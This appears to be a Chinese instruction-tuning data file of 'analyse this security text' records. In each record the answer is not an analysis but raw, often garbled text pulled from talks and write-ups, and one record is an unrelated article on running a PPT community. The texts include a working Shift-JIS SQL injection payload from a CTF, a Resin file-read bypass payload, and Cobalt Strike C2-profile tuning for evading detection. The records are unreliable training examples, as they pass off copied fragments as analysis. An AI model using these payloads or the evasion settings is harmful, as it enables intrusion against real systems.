{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEquation NOPEN Equation NOPEN 概述 基本信息 运行方法 本地环境变量 本地客户端命令 keepalive autopilot norc 远程目录命令 find cd ls 远程文件操作 get put cat upload grep mailgrep cksum chili 远程网络穿透 tunnel irtun istun jackpop nrtun nstun rawsend rtun rutun stun sutun scan vscan 远程网络命令 icmptime ifconfig nslookup ping trace 远程服务端命令 pid listen call burn 远程服务端常用命令 elevate ps shell time status getenv setenv gs 操作分析 服务端反向连接到客户端 指定服务端口的正向连接 命令脚本的批量执行 autopot incision 隧道的综合利用 elevate 对比分析 会话密钥生成 scaner ourtn scripme 总结 参考 概述 作者根据EQGRP公开资料进行研究分析研究相关工具的开发实现和攻击防御思路 NOPEN木马工具为针对Unix/Linux系统的远程控制工具主要用于文件窃取系统提权网络通信重 定向以及查看目标设备信息等是一个典型的C2程序 NOPEN木马工具编码技术复杂功能全面隐蔽性强适配多种处理器架构和操作系统并且采用了 插件式结构可以与其他网络武器或攻击工具进行交互和协作 NOPEN木马工具包含客户端noclient和服务端noserver两部分客户端会采取发送激活包的方式与 服务端建立连接使用RSA算法进行秘钥协商使用RC6算法加密通信流量 基本信息 这里分析的代码来自github上的泄露在Linux\\bin\\目录下 对实际样本感兴趣的可以根据cncert的文章进行抓取和分析 运行方法 这里的测试环境有两台机器一台是centos4运行noserverIP地址是172.19.2.11另一台是 centos5运行noclientIP地址是172.19.2.13. 启动服务端 md5sum noclient-3.3.2.3-linux-i386 noserver-server 1d5bd438d76dd09edb91bbe81fc8e4f0 noclient-3.3.2.3-linux-i386 ee38509ddc4bef24d387c511c577895a noserver-server ./noserver-server [root@centos4x86 bvp47]# ps aux | grep no root 5107 0.0 0.0 1784 332 pts/2 S 05:15 0:00 ./noserver-server [root@centos4x86 bvp47]# lsof -p 5107 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME noserver- 5107 root cwd DIR 253,0 4096 1109807 /root/bvp47 noserver- 5107 root rtd DIR 253,0 4096 2 / noserver- 5107 root txt REG 253,0 158686 1109895 /root/bvp47/noserver- server noserver- 5107 root mem REG 253,0 112212 898616 /lib/ld-2.3.4.so 这样服务端启动完毕运行在32754端口 启动客户端 noserver- 5107 root mem REG 253,0 1547588 898617 /lib/tls/libc-2.3.4.so noserver- 5107 root mem REG 253,0 81140 897717 /lib/libresolv-2.3.4.so noserver- 5107 root 0u CHR 1,3 2108 /dev/null noserver- 5107 root 1u CHR 1,3 2108 /dev/null noserver- 5107 root 2u CHR 1,3 2108 /dev/null noserver- 5107 root 3u IPv4 75542 TCP *:32754 (LISTEN) ./noclient-3.3.2.3-linux-i386 172.19.2.11 NOPEN! v3.3.2.3 sh: scanner: command not found sh: ourtn: com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPortable Privacy Portable Privacy 2006: Darfur, Sudan 1989: Beijing, China 2005: United States of America Portable Privacy Alias: LadyAda Name: Limor Fried Crime: Felony Assault w/ Banana Location: New York, NY Hangouts: Adafruit Industries Notes: Gang member of cow worshipping death cult Last Seen: In the Company of Kevin Rose Portable Privacy 3 Golden Principles  Portability  Elegance  Trustworthiness Portable Privacy Portability  Run Locally  Run Remotely Portable Privacy Trustworthiness  Bypassed by Trust  Source Code  License  Fail Securely  Imputed Protection Portable Privacy Elegance (HCI and Beyond) Who Cares? Everyone Portable Privacy Elegance (HCI and Beyond)  Appealing  Intuitive  Easy to Use  Self  Contained  Informative Status  Transparency Portable Privacy Digital Risk Vectors  Communications  Data Storage  Transactions  Computing Environment Portable Privacy Communications  General  Web Browsing  Email  Chat / Messaging  VoIP Portable Privacy General  Janus VM  xB VPN Portable Privacy Web Browsing  Anonymizer  xB Browser - Tor Network - XeroBank Network  OperaTor  Honorable Mentions  Dishonorable Mentions Portable Privacy Email Clients  Thunderbird Portable  MobilityEmail  xB Mail Portable Privacy Messaging  IRC  Scatterchat  Psi  Miranda + OTR  Pidgin + OTR Portable Privacy VoIP  Portable Skype  myJabber  Vonage USB Portable Privacy Data Storage Portable Privacy Transactions  Risky Digital Currencies  Anonymous Currencies - Loom - eCache Portable Privacy Computing Environments  RockAte LiveCD  Incognito LiveCD  xB Machine Portable Privacy xB Machine  Runs on VMWare & QEMU  Private Network Info Only  Firewalled to Interface  Hardening  Clients: Tor, Jap, xB SSH, xB VPN, xB Onion Portable Privacy xB Machine  Usability Features - Firefox - Thunderbird - GPG / Enigmail - Jabber - Word Processor - Image Viewer - File Manager - Autoconfig of Anonymity Clients - Remote Encrypted Filesystem Mounts Portable Privacy xB Machine  Usability Features - Local User ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2021$ Skrull$Like$A$King$ 從重兵看守的天眼防線殺出重圍 aaaddress1@chroot.org April&21,&2021 2 Sheng-Hao$Ma$ Threat&Researcher&at&TXOne&Networks  Core$member$of&CHROOT&Security&Group&  Over$10-year$experience$in&reverse&engineering,&Windows& vulnerability,&and&Intel&8086.&  Spoke$at&S&P,&BlackHat,&DEFCON,&HITB,&HITCON,&VXCON,& ROOTCON,&CYBERSEC,&SITCON,&etc.&  Instructor$of&Ministry&of&National&Defense,&Ministry&of& Education,&HITCON,&and&etc.&  Publication$Windows(APT(Warfare(惡意程式前線戰術指南 Background April&21,&2021 Background 4 April&21,&2021 Background 5 April&21,&2021 Background 6 April&21,&2021 Background 7 April&21,&2021 AntiVirus$Design  Malware&Detection&  Signature-Patterns&Scanning&e.g.&YARA&  ML:&Heuristic-Detection&e.g.&SVM&  Virtual&Machine&(VM)&  When&To&Scan?&  Regular&Schedule&Service&  Minifilter&&&PsSetCreateProcessNotifyRoutine&  Automatic&Sample&Submission& 8 April&21,&2021 Challenge 9  Malware&Detection&  Signature-Patterns&Scanning&e.g.&YARA&  ML:&Heuristic-Detection&e.g.&SVM&  Virtual&Machine&(VM)&  When&To&Scan?&  Regular&Schedule&Service&  Minifilter&&&PsSetCreateProcessNotifyRoutine&  Automatic&Sample&Submission& inject&malware&into&trusted&system&processes,& without&triggering&AV/EDR? April&21,&2021 Challenge 10  Malware&Detection&  Signature-Patterns&Scanning&e.g.&YARA&  ML:&Heuristic-Detection&e.g.&SVM&  Virtual&Machine&(VM)&  When&To&Scan?&  Regular&Schedule&Service&  Minifilter&&&PsSetCreateProcessNotifyRoutine&  Automatic&Sample&Submission& our&payload&shouldn't&be&scanned April&21,&2021 Challenge 11  Malware&Detection&  Signature-Patterns&Scanning&e.g.&YARA&  ML:&Heuristic-Detection&e.g.&SVM&  Virtual&Machine&(VM)&  When&To&Scan?&  Regular&Schedule&Service&  Minifilter&&&PsSetCreateProcessNotifyRoutine&  Automatic&Sample&Submission& can&we&protect&our&malware&against&reversing,& even&if&the&binary&got&captured&in&hand? April&21,&2021 Skynet$by$AV/EDR 12  Malware&Detection&  Signature-Patterns&Scanning&e.g.&YARA&  ML:&Heuristic-Detection&e.g.&SVM&  Virt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"NOTIFY\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME NOTIFY \\- 生成一个通知 .SH SYNOPSIS .sp .nf NOTIFY \\fIname\\fR .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBNOTIFY\\fR 命令向当前数据库中所有执行过 LISTEN name 正在监听特定通知条件的前端应用发送一个通知事件 .PP 传递给前端的通知事件包括通知条件名和发出通知的后端进程PID 数据库设计者有责任定义用于某个数据库的条件名和每个通知条件的含义 .PP 通常通知条件名与数据库里的表的名字相同 通知时间实际上意味着\"我修改了此数据库请看一眼有什么新东西\" NOTIFY 和 LISTEN 命令并不强制这种联系例如数据库设计者可以使用几个不同的条件名来标志一个表的几种不同改变 .PP \\fBNOTIFY\\fR 为访问同一个 PostgreSQL 数据库的一组进程提供了一种简单的信号形式或进程间通讯机制 更高级的机制除了一个简单的通知名以外可以通过使用数据库中的表从通知者传递数据到被通知者 .PP 当NOTIFY用于通知某一特定表修改的动作的发生 一个实用的编程技巧是将 NOTIFY 放在一个由表更新触发的规则里用这种方法 通知将在表更新的时候自动触发而且应用程序员不会碰巧忘记处理它 .PP \\fBNOTIFY\\fR 和 SQL 事务用某种重要的方法进行交换首先如果 NOTIFY 在事务内部执行通知事件直到事务提交才会送出 这么做是有道理的因为如果事务退出了 那么在它里面的所有命令都没有效果  包括 NOTIFY但如果有人希望通知事件立即发送这就不太好了 其次当一个正在监听的会话在一次事务内收到一个通知信号 直到本次事务完成提交或退出之前该通知事件将不被送到与之相连的客户端 同样如果一个通知在事务内部发送出去了 而该事务稍后又退出了我们就希望通知可以在某种程度上被撤消 但通知一旦发送出去服务器便不能从客户端\"收回\"通知 所以通知时间只是在事务之间传递这一点就要求使用 NOTIFY 作为实时信号的应用应该确保他们的事务尽可能短 .PP \\fBNOTIFY\\fR 在一方面的行为象 Unix 的信号 如果同一条件名在短时间内发出了多条信号接收者几次执行 NOTIFY 可能只回收到一条通知信息 所以依赖于收到的通知条数的方法是很不可靠的因而使用 NOTIFY唤醒需要关注某事的应用 同时还要使用数据库对象如序列号来跟踪事件发生了几次 .PP 客户端经常会自己发送与正在监听的通知名一样的 NOTIFY 这时它客户端也和其他正在监听的会话一样收到一个通知事件 这样可能导致一些无用的工作与应用逻辑有关 例如 对客户端刚写过的表又进行一次读操作以发现是否有更新 我们可以通过检查服务器进程的PID在通知事件中提供 是否与自己的后端的PID一致从 libpq 中取得当他们一样时 说明这是其自身回弹的信息可以忽略不管前面章节是如何讲的这是一个安全的技巧 PostgreSQL 保持自身的通知和其他到来的通知区分开 所以你屏蔽了自己的通知后不会略过外部的通知 .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 生成信号通知的通知条件任何标识符 .SH \"EXAMPLES 例子\" .PP 在 \\fBpsql\\fR 里配置和执行一个监听/通知对 .sp .nf LISTEN virtual; NOTIFY virtual; Asynchronous notification \"virtual\" received from server process with PID 8448. .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP 在 SQL 标准里没有 NOTIFY 语句 .SH \"SEE ALSO 参见\" LISTEN [\\fBlisten\\fR(7)], UNLISTEN [\\fBunlisten\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nState of DNS Rebinding Attack & Prevention Techniques and the Singularity of Origin Gérald Doussot & Roger Meyer | DEF CON 27 New Tool: Singularity  Everything you need for DNS rebinding  Reliable: Default settings just work  Performant: up to 20x faster (3s vs 60s)  Built-in payloads: Jenkins, Rails, AWS Instance Metadata, etc...  Autopwn: Networks & services scan, service detection and auto-exploitation Contributions Neat Technical Details/Techniques  Speed: Multiple DNS answers and cache flooding  Protection Bypasses: 3 different bypasses for common DNS rebinding protections  Using DNS trickery  Hook/Control - Interactively browse the victims internal network  Websocket proxying, no HTTP proxy needed! Agenda  A Refresher on DNS Rebinding  DNS Rebinding Attack: Building on reliable foundations  The Need for Speed: DNS rebinding in 3 seconds  Protection Bypasses: 3 different bypasses for common DNS rebinding protections  Hook and Control: Interactively browse the victims internal network  Scanning for Vulnerable Host Services  Automation: Service detection & exploitation and orchestrating all the above Introduction Who Are We  Gérald Doussot and Roger Meyer  Security consultants at  San Francisco, CA  Authors of Singularity of Origin, a DNS Rebinding Attack Framework https://github.com/nccgroup/singularity Why Should You Care About DNS Rebinding bind 0.0.0.0 Why Should You Care About DNS Rebinding bind 127.0.0.1 Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding Why Should You Care About DNS Rebinding  Prevalence of apps exposing HTTP servers on localhost (e.g. Electron)  IoT devices exposing sensitive interfaces on internal networks  Misconceptions  DNS rebinding is slow  DNS rebinding can be solved by out-of-the-box DNS filtering products or services A Refresher on DNS Rebindin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Good Morning (web, 3 points, 110 solves) http://52.86.232.163:32800/ https://s3.amazonaws.com/bostonkeyparty/2016/bffb53340f566aef7c4169d6b74bbe01be56ad18.tgz In this task we were given a source of web survey. It used MySQL in backend to store our answers. The script was not using prepared statements, so we quickly came to conclusion that there has to be a SQL injection possible. Unfortunately, our input was escaped before passing to MySQL library. However, they use their home-made escaping function instead of properly tested official ones. Because the site was in Japanese, they used Shift-JIS character encoding. One of the oddities conencted to this encoding is that it changes position of backslash - 0x5C, which is ASCII backslash, in SJIS means yen. The websocket and Python script itself (including escaping function) use Unicode, so we can send `[yen]\" stuff`, which will be converted by escaping function to `[yen]\\\" stuff`, and then converted to SJIS `0x5C\\\" stuff`. Since 0x5C is equivalent to backslash, that means our input will be interpreted as one escaped backslash, followed by unescaped quote, enabling us to put arbitrary SQL code there. Proof: ``` >>> print mysql_escape(json.loads('{\"type\":\"get_answer\",\"question\":\"q\",\"answer\":\"\\u00a5\\\\\\\"\"}')[\"answer\"]).encode(\"sjis\") \\\\\" ``` Exploiting via Chrome developer console: ``` socket.onmessage=function(e){console.log(e.data);}; socket.send('{\"type\":\"get_answer\",\"question\":\"q\",\"answer\":\"\\u00a5\\\\\\\" OR 1=1 -- \"}') VM416:2 {\"type\": \"got_answer\", \"row\": [1, \"flag\", \"BKPCTF{TryYourBestOnTheOthersToo}\"]} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRESEARCH ON THE MACHINES HELP THE FTC PROTECT PRIVACY AND SECURITY Humans User: Terrell McSweeny Function: Commissioner, FTC @TMcSweenyFTC User: Lorrie Cranor Function: Chief Technologist, FTC @lorrietweet Machines Speech Schematics Privacy & Security Protections Now Issues of the Day We Need Your Help! How does the FTC respond to the Rise of the Machines? When machines are everywhere? What does the FTC do? Unfair Deceptive What do unfair and deceptive mean?  Unfair =  Substantial Injury to Consumers  Unavoidable  Not Outweighed Procompetitive By Benefits  Deceptive =  Act Likely to Mislead Consumers  Unreasonable  Material For Example  Facebook promised to keep personal info safe, but allowed 3rd party access Google promised Gmail contacts wouldnt be used elsewhere, but used them in its social-media site, Buzz Snapchat promised images would disappear, but kept them For Example  Wyndham unfairly exposed consumers payment-card info in three separate data breaches ORACLE promised its updates would protect consumers, but didnt protect older versions of Java SE. ASUS promised its routers would protect local network against attacks, but failed to update them enough How do we decide what cases to bring? Research Media Complaints Current Issues Mobile phone account hijacking and new account fraud Number of incidents reported % of identity theft reports January 2013 1,083 3.2% January 2016 2,658 6.3% Reported to FTC Consumer Sentinel Network PII FCC NHTSA DOE FAA HIPPA Defenseless Data FACTA ECOA COPPA FCR A FTC Act FTC Sept.&9,&2015&&San&Francisco& Nov.&5,&2015&-&Aus;n& Feb.&9,&2016&-&Sea>le& June&15,&2016&-&Chicago& 2017&&Stay&Tuned& Outreach Office of Technology Research & Investigation 2016 Fall Technology Series Ransomware September 7 Drones October 13 Smart TV December 7 ftc.gov/tech Putting Disclosures to the Test September 15, 2016 ftc.gov/tech ftc.gov/tech January 12, 2017 Research Wish List: What is the FTC looking for? We want  Research on Privacy & Security  Wha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow South Korea Makes White-hat Hackers # 2013 edition! beist (Korea University, GrayHash) email: beist@grayhash.com web: http://grayhash.com About me SeungJin Beist Lee Ms-Phd course at Korea University (CIST IAS LAB) Member of advisory council for Cyber Command in Korea Principal Security Consultant at GrayHash Consulting for big companies in Korea Many wins at hacking contests/Run hacking contests/conferences Talk at SYSCAN, CANSECWEST, TROOPERS, SECUINSIDE, etc Hunting bugs is my favorite hobby Intro This is not a tech talk Very easy talk, so, relax This talk doesnt say everything about the situation in Korea But tried to put together as much as i can A bit of security scene history in Korea How we get inspired How we make white-hat hackers This is an extended version of AVTOKYO talk i gave at When the scene gets activated People say the scene has been started since the end of 90 There were 2 big events at that time Elite hackers at top universities (Postech and Kaist) They were hacking each other and some went to jail This was issued even on the media Hackerslab (Wargame site) Most underground hackers started from the site First well-known infosec IRC in Korea When the scene gets activated From 2000, there have been underground teams Hackerschool BEISTLAB Wowhacker Null@root No illegal stuff, they teach and train next generation Many of them are now high-ups and still working in this field They really do for the community When the scene gets activated Industry around 2000 There were many security products Mostly, IDS, Firewall and Secure OS But penetration testing really made infosec guys As its hack Pen-testing business was really messed up at that time Companies stole others contracts by hacking Why the scene is motivated? (What happened?) Motivations to Government Industry The community Why the scene is motivated? (What happened?) Government We have a very special situation South Korea vs North Korea The government started to find good hackers They (secretly) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRouting in The Dark Scalable Searches in Dark P2P Networks Ian Clarke and Oskar Sandberg The Freenet Project Ian Clarke & Oskar Sandberg - 2005  p.1/33 Introduction  We have long been interested in decentralised Peer to Peer networks. Especially Freenet. Ian Clarke & Oskar Sandberg - 2005  p.2/33 Introduction  We have long been interested in decentralised Peer to Peer networks. Especially Freenet.  But when individual users come under attack, decentralisation is not enough. Ian Clarke & Oskar Sandberg - 2005  p.2/33 Introduction  We have long been interested in decentralised Peer to Peer networks. Especially Freenet.  But when individual users come under attack, decentralisation is not enough.  Future networks may need to limit connections to trusted friends. Ian Clarke & Oskar Sandberg - 2005  p.2/33 Introduction  We have long been interested in decentralised Peer to Peer networks. Especially Freenet.  But when individual users come under attack, decentralisation is not enough.  Future networks may need to limit connections to trusted friends.  The big question is: Can such networks be useful? Ian Clarke & Oskar Sandberg - 2005  p.2/33 Overview of Peer to Peer net- works  Information is spread across many inter- connected computers Ian Clarke & Oskar Sandberg - 2005  p.3/33 Overview of Peer to Peer net- works  Information is spread across many inter- connected computers  Users want to find information Ian Clarke & Oskar Sandberg - 2005  p.3/33 Overview of Peer to Peer net- works  Information is spread across many inter- connected computers  Users want to find information  Some are centralised (eg. Napster), some are semi- centralised (eg. Kazaa), others are distributed (eg. Freenet) Ian Clarke & Oskar Sandberg - 2005  p.3/33 The Small World Phenomenon  In \"Small world\" networks short paths exist between any two peers Ian Clarke & Oskar Sandberg - 2005  p.4/33 The Small World Phenomenon  In \"Small world\" networks short paths exist between any two peers  People tend to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n使用CobaltStrike从学习C2profile开始 0x00 前言 我一直是CS的忠实粉丝随着CS4.4的发布增加了反射DLL的自定义功能让CS越来越高度可定制化 了完全没有必要因为防御方的各种查杀CS而放弃CS转而选择其他C2或者自己编写C2当然我也 认可在一次高对抗的红队行动中前锋马潜伏马是必不可少的多备几套C2方案也没有问题 如果你在行动中在流量层被查杀那么你一定是没有用好C2profile我不打算一一解释C2profile的参 数的意义因为官方文档很详细了https://www.cobaltstrike.com/help-malleable-c2也可以阅读http s://github.com/Tylous/SourcePoint#global-options 这个SourcePoint是近期出现的适应最新版本的C2profile自动生成工具上一个类似工具是https://git hub.com/FortyNorthSecurity/C2concealer但是现在已经落后了推荐使用SourcePoint 0x01 SourcePoint 这个工具目前还缺少DNS相关的C2profile不过作者已经增加到To Do List接下来我们使用一下这个 工具这个工具是用GO编写的作者也发布了编译好的版本因此使用非常容易我们使用最简参数 也就是必须填写的参数 -Outfile 输出文件名 -Host TeamServer的域名或IP -Injector 进程注入使用的函数 我们来看下生成的C2profile怎么样 图中有一个[!]就是默认是开启了分阶段的这个开启会导致任何人可以下载你的payload具体 看关于CobaltStrike的Stager被扫问题 配置中缺少了 set sample_name \"myc2profile\"; 还是要给c2配置取个名字启动Listener的时候 好选择 set sleeptime \"40000\"; 默认生成的这个有点大默认是60000也就是60秒这儿是40秒每 次我都感觉等的着急我一般设置在10秒也就是10000然后抖动值为50也就是 set jitter \"50\"; 也就是说回连在5到10秒之间抖动当然在不操作的时候还是要设置回连间 隔长一点我一般设置15到30分钟之间 DNS相关配置是被注释掉的需要我们手动配置 SourcePoint.exe -Outfile my.c2profile -Host 127.0.0.1 -Injector NtMapViewOfSection dns-beacon { set dns_idle \"8.8.8.4\"; set dns_max_txt \"196\"; # 这个需要注意需要被4整除的数字 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-08-19 No. 1 / 5 - Welcome to www.red-team.cn 配置中transform-x86和transform-x64把大部分关键字抹除掉了这个很多公开的配置都没 有点赞 set startrwx \"true\"; 这个配置中是true改为false还是不要用可读可写可执行来分配内存 set amsi_disable \"true\"; 这个CS自带AMSI绕过技术开启需要注意毕竟CS是大众工具 CS自带的方法很有可能被特征这也是为什么以前好用的execute-assembly有时不好用 了.net4.8加入了AMSI的接口因此如果你在有.net4.8以上的机器上使用要慎重目前使用比 较多的是BOF或者自己byapss amsi set uri \"hapvwW2LESRmSSSc8oLrQrS4M \"; 默认的这个url是有问题的需要以 / 开始可以使 用/api/v1/auth这样比较常见的url 证书使用的是自签名证书最好还是搞个免费证书 整体看这个工具还是不错的关键是它关于HTTP(S)数据包伪造除了提供了6个模板 Microsoft Window's Update Communication Slack's Message Communication Gotomeeting's Active Meeting Communication Microsoft Outlook's Email Communication Cloudfront.net AzureEdge.net 还可以自己定义模板比如模仿访问qq.comalipay.com的http数据包内容 修改完一定要使用c2lint验证是否正确但是c2lint也不是万能的例如如果把回传数据加入url当 中并使用base64编码由于base64的字符中包含能够影响u", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n笔记本 用户运营 创建时间 2020/4/4 11:24 更新时间 2020/4/4 12:32 作者 邵云蛟 URL https://mp.weixin.qq.com/s/qgChhHyfle0DXBMTsm-vtQ 星球圆桌如何提升社群活跃度 分享人邵云蛟 旁友圈PPT学习社群创建者 之前受知识星球运营采访聊了一些如何提升社群活跃度的方法后来在运营的过程中又有 了一些新的想法在这里分享一下 如果你经常看星球活跃榜会发现旁友圈 PPT 学习社群经常会出现在前3名之中截止到目 前星球定价365元人数已经超过了25000人主题数超过40000条评论数近16W条应该算 是比较活跃了对吗 那想要保持一个社群的高活跃度最好的状态我个人的理解是让它具备自生长的能力也就是 不用天天变着法地搞活动用户进入到这个社群里它也能够依旧活跃大家都能够聊的起来 这是我运营社群的目标 那我是怎么做的呢 一定要给所有人一个能够持续讨论的东西别人加入星球就是为了这个事儿来的而且这个 事儿还要是持续的以及围绕这个事儿有要讨论的意愿 啥意思呢咱们先抛开任何的社群工具不管是知识星球还是知识宇宙之类的因为社群工具 起到的作用只是加强讨论的便利性而离开社群工具之后对于一件事情大家还有要讨论的 想法吗如果没有那可能就不适合做社群 举个例子比如有很多分享资源的社群大家来这里的目的就是领资源很少会主动讨论对 吗 这时候问题来了难道没有更方便的资源领取的工具吗肯定有那为啥还选择社群工具呢对 不对 那旁友圈是怎么做的呢 我们建立社群之初就干一件事儿完成 PPT 作业为啥选这个事儿呢 首先这个事儿值得用户付费加入因为有专门的老师指导如果不理解想想线下的培训班 想想找家教不就是想找个人辅导吗这个需求本来就有我只是搬到了线上且更方便了 其次这个事儿是持续的每周一期的练习而且每期内容都不一样持续性没啥问题 最后这个事儿有讨论的意愿在做作业的过程中难免遇到大大小小的问题交流学习肯定是 在所难免不管是线上还是线下这个需求始终存在 到这里能理解了对吗 当然上面说的这个事儿想让它持续运转下去离不开一个前提那就是要不断有新学员加 入因为一个学员他终有学会的一天当学有所获之后学员就会慢慢流失如果没有新的学 员来加入那么这个事儿就会陷入一个恶性的循环 那就是因为很少有人做作业了所以其它学员也就不愿意讨论了因为没有很多不一样的观 点和作品值得讨论慢慢地社群就挂了 当然问题来了该如何让更多学员原意加入进来呢我的做法是提高社群价值怎么做呢 围绕做作业这个事儿我们开发了4门系统型 PPT 学习课程并且把社群内每年的 PPT 优秀作业 整理一遍在年末推出一份近2000页的 PPT 设计灵感手册而且还有其它服务总之都是围 绕着练习这个事儿展开的 所以每天都会有新的学员加入进来 好像有点跑题了这篇主要想分享的是提高社群活跃度用户增长的事儿今天不过多讨论继 续回到前面关于社群作业的这个事儿 有一些布置作业的思考在这里结合之前的采访也分享一下 Q小星探每次布置一道作业题会做哪些准备 A星主邵云蛟布置作业题目的话其实是在每年年初就策划好了的因为我们的星球里在新 人加入的时候会有一个表单 我们会了解到他做 PPT 的实际需求以及他个人的职业属性通过这个信息呢我们基本上就 能够判定出星球里大多数人经常要做的 PPT是哪种类型在年初规划相关作业题目的时 候就把这个规划进去 另外呢做过 PPT 的朋友都知道其实 PPT 的页面类型呢有很多种比如像封面目录地 图时间轴图表表格等我们制定每一期作业题目的时候也会基于这个维度进行策划 Q小星探为什么会建议星友交作业打上标签#这个标签发挥了什么作用 A星主邵云蛟之所以要打标签这个就很简单了是因为便于分类查找 而且我们还有一个特别的需求因为我们的星球每年年底也就是 12 月份会把一年内所提 交的优秀作业给分类整理推出一个 1980 页 PPT 设计灵感手册就是收录了每周的优秀作 业今年是第 3 年 使用这个功能的话便于我们的同事们去分类整理这些 PPT 页面 除此之外之所以一定要打上标签的原因还有一个作用在于内容区分 因为我们的星球里有很多围绕着 PPT 的栏目内容如果没有标签进行区分的话会很容易混 淆这个的作用我理解的就类似于网页的导航栏吧 Q小星探鼓励星友交作业在星球运营上起到了什么作用 A星主邵云蛟鼓励星友交作业在星球的运营上更多的是维持了星球的活跃度因为这是星 球里每周固定要做的事情做作业这件事儿本身就相当于一个信号 大家在每周二的晚上就知道有新的作业要出现了在下周一的晚上优秀作业就放榜了长期 以来大家就会形成进入社群的一种惯性每周至少要来那么几次 而且因为我们更加偏向的是 PPT 的设计制作鼓励更多人去交作业会连带衍生出更多的社区 内容比如一份优秀作业他做的好了那是不是可以考", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Resin<=Q.L.TS件读取 个前发现的洞直接fuzz到的p0desta师傅挺早就发现了官在去年128号修复了这个漏洞 https://caucho.com/products/resin/download 此漏洞泛微不可因为泛微的安全过滤器不允许URL出现分号 看过resin代码的都知道他在下这个地匹配 Servlet com.caucho.server.dispatch.ServletMapper#mapServlet 默认存在 resin-file 和 resin-jsp 当所有 Servlet 都匹配不到的时候就会 resin-file 先看读取jsp件内容 com.caucho.server.dispatch.ServletMapper#mapServlet 前 代码分析 2 此处先获取根据 invocation.getContextURI() 获取URL然后进 stripPathParameters 处 理路径参数也就是去除分号及其后的字符得到 /b.jsp. 再与 _servletMap 的正则匹配此时匹 配不到就会进默认的 resin-file 进件读取 com.caucho.servlets.FileServlet#service 3 先根据 servletpath 获取到 /b.jsp. 然后进 getRealPath 进 normalizeUri 4 如果是windows的话会将最后个.或空格移除还有就是会将斜杆前的点或空格移除 这样跟下来有的就会问为啥 /b.jsp. 不能直接读件啊 因为实际上在到达 com.caucho.server.dispatch.ServletMapper#mapServlet 之前会先进  com.caucho.server.dispatch.InvocationDecoder#splitQueryAndUnescape 在这就会先对 uri 进 normalizeUri 去除这个 . 所以payload是 %20;xxx 或者 .;xxx  读WEB-INF下的 5 主要是在这做了限制原理和上样这的是 relPath 来判断是没有去除空格的但是不能使  /.;/WEB-INF/XXX 因为在 normalizeUri 存在个判断 6 意思概是如果斜杆后是分号就报错如果斜杆后是点的话会先跳过点判断其他的就和前类似 了 com.caucho.server.dispatch.InvocationDecoder#normalizeUri(java.lang.Strin g, boolean) 研究了下没绕过的思路了 normalizeUri 对空格和点在某些特殊位置的处理两次传 normalizeUri 时利分号的特性 使得最开始的次带分号进第处不带分号进 三官修复 四总结 7", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRepelling the Wily Insider Ma#as Madou, PhD / Jacob West DEF CON 18 / Las Vegas, NV / 7.30-8.1, 2010 7/4/10 2 Ma#as Madou  Security Researcher @ For#fy SoKware  Focus on new techniques to find vulnerabili#es (sta#c and dynamic)  New ways to protect WebApps  Contributor to BSIMM Europe  History in Code Obfusca#on (& Binary Rewri#ng) 7/4/10 3 Jacob West  Director of Security Research, For#fy SoKware  Secure Programming with Sta#c Analysis  Speaker at RSA, Black Hat, Def Con, OWASP, SANS, Web 2.0  Contributor to MOPS, a C/C++ sta#c analysis tool (UC Berkeley) 7/4/10 4 Overview  Intro  Insider Threat Background  Classes of Insider Threats  Techniques for Defenders  Face-Off  Conclusion 7/4/10 5 2009 Computer Crime Survey  43% of the companies had losses due to malicious insiders (66% due to non-malicious) 7/4/10 6 Overview  Intro  Insider Threat Background  Classes of Insider Threats  Techniques for Defenders  Face-Off  Conclusion 7/4/10 7 Which Insiders?  Developers  Less destruc#ve, more subtle. Reason: Trace code back to the developer  not about IT people 7/4/10 8 Mo#ves 7/4/10 9 What if You Get Caught?  Medco: Failed Logic Bomb: 30 months (up to 10y)  UBS: Successful Logic Bomb: 8 years 7/4/10 10 What We're Looking For: Bad Code 7/4/10 11 2004 Obfuscated Vo#ng Contest  2004 coding contest hosted at Stanford  41 par#cipants submit electronic vo#ng code  Objec#ves:  Count correctly in test mode  Skew toward one candidate during the real elec#on  Human code reviewer should not no#ce the bias  Skew should be subtle enough to avoid aken#on 7/4/10 12 Contest Results  Techniques used by top 10 entries 1 4 2 3 Buffer Overflow Unini#alized Memory Convoluted or obscured logic Dangerous language features (macros) 7/4/10 13 Overview  Intro  Insider Threat Background  Classes of Insider Threats  